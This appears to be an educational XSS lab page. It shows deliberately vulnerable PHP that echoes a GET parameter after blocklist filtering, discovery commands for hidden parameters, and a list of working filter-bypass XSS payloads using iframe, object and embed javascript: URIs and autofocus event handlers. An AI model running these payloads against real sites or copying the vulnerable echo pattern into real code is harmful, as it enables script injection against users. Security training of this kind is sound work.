KrazePlanetLabs - Advanced Hidden Parameter XSS Lab

Advanced Filtering Challenge

Lab Overview

This lab contains multiple hidden parameters with extensive filtering that blocks various encoding techniques. The visible form uses secure HTML encoding, but there are several hidden endpoints with advanced filtering.

Visible Challenge: Basic HTML encoding using htmlspecialchars() for both first name and last name parameters.

Hidden Parameters: There are multiple hidden parameters that are not shown in the form. Use tools like Arjun to discover them!

id cat page number page_id categoryid

Advanced Filter: Extensive string replacement that blocks multiple dangerous strings, case variations, and encoding attempts

Blocked items include:

Keywords: script alert confirm prompt eval img svg onfocus ontoggle onmousemove onmouseover

Case Variations: Script sCript scRipt scrIpt scriPt scripT SCript SCRipt SCRIpt SCRIPt SCRIPT

Encoding Attempts: HTML entities Hex encoding Unicode escapes String concatenation Array notation

Filter method: str_replace($arr, '', $_GET['parameter']) with extensive blocklist of 100+ items

Filter Complexity: Extensive Blocklist Filtering

Objective: Discover the hidden parameters and bypass the extensive filter to execute XSS.

Backend Source Code

if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle','onmousemove','onmouseover','script','Script','sCript','scRipt','scrIpt','scriPt','scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT','script','img','image','svg','onfocus', '"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">', '"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">', '"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">', "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "\u0061lert(1)", "a\u006cert(1)", "al\u0065rt(1)", "ale\u0072t(1)", "aler\u0074(1)", "\u0061\u006c\u0065\u0072\u0074(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "\u0063onfirm(1)", "c\u006fnfirm(1)", "co\u006efirm(1)", "con\u0066irm(1)", "conf\u0069rm(1)", "confi\u0072m(1)", "confir\u006d(1)", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "\u0070rompt(1)", "p\u0072ompt(1)", "pr\u006fmpt(1)", "pro\u006dpt(1)", "prom\u0070t(1)", "promp\u0074(1)", "\u0070\u0072\u006f\u006d\u0070\u0074(1)", "['ale'+'rt'](1)");
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Similar code for cat, page, number, page_id, categoryid
# use arjun tool to find hidden parameters

Test Input Forms

Challenge 1: HTML Encoding (Visible)

Challenge 2: Hidden Parameters with Advanced Filtering

Hint: There are multiple parameter names not shown in the form. You need to discover them using parameter discovery tools.

Try these hidden parameters:

id cat page number page_id categoryid

Parameter Discovery & Bypass Techniques

Parameter Discovery Tools:

Arjun: arjun -u https://example.com
ParamSpider: python3 paramspider.py -d example.com
FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, cat, category, number, etc.

Bypass Techniques for Advanced Filter:

Alternative tags: Use <iframe>, <object>, <embed>
Alternative events: Use onload, onerror, onclick
Template literals: Use ${alert(1)} in certain contexts
Uncommon tags: Try <marquee>, <audio>, <video>
Alternative protocols: Use vbscript:, data: URIs

Security Implications

This lab demonstrates:

Multiple hidden parameters create complex attack surfaces
Even extensive blocklists can have bypasses
Blocklist-based filtering is inherently incomplete
Parameter discovery is critical for comprehensive security testing
Different parameters may have different security implementations
Complex filters can create false sense of security

Best Practices

For secure web applications:

Use allowlist-based validation instead of blocklists
Implement context-aware output encoding
Use Content Security Policy (CSP) headers
Conduct thorough parameter discovery during testing
Document all API endpoints and parameters
Use security headers: X-XSS-Protection, X-Content-Type-Options
Regularly update and test security controls

Payload Examples for Advanced Filter

Alternative Tag Vectors:

<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<base href="javascript:alert(1)//">
<form action="javascript:alert(1)"><input type=submit>

Alternative Event Handlers:

<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>

Advanced Bypass Techniques:

<marquee onstart=alert(1)> - Marquee tag with onstart
<audio src=x onerror=alert(1)> - Audio tag
<video src=x onerror=alert(1)> - Video tag
<applet code="javascript:alert(1)"> - Applet tag
<isindex type=image src=1 onerror=alert(1)> - Isindex tag
<button onfocus=alert(1) autofocus> - Button with autofocus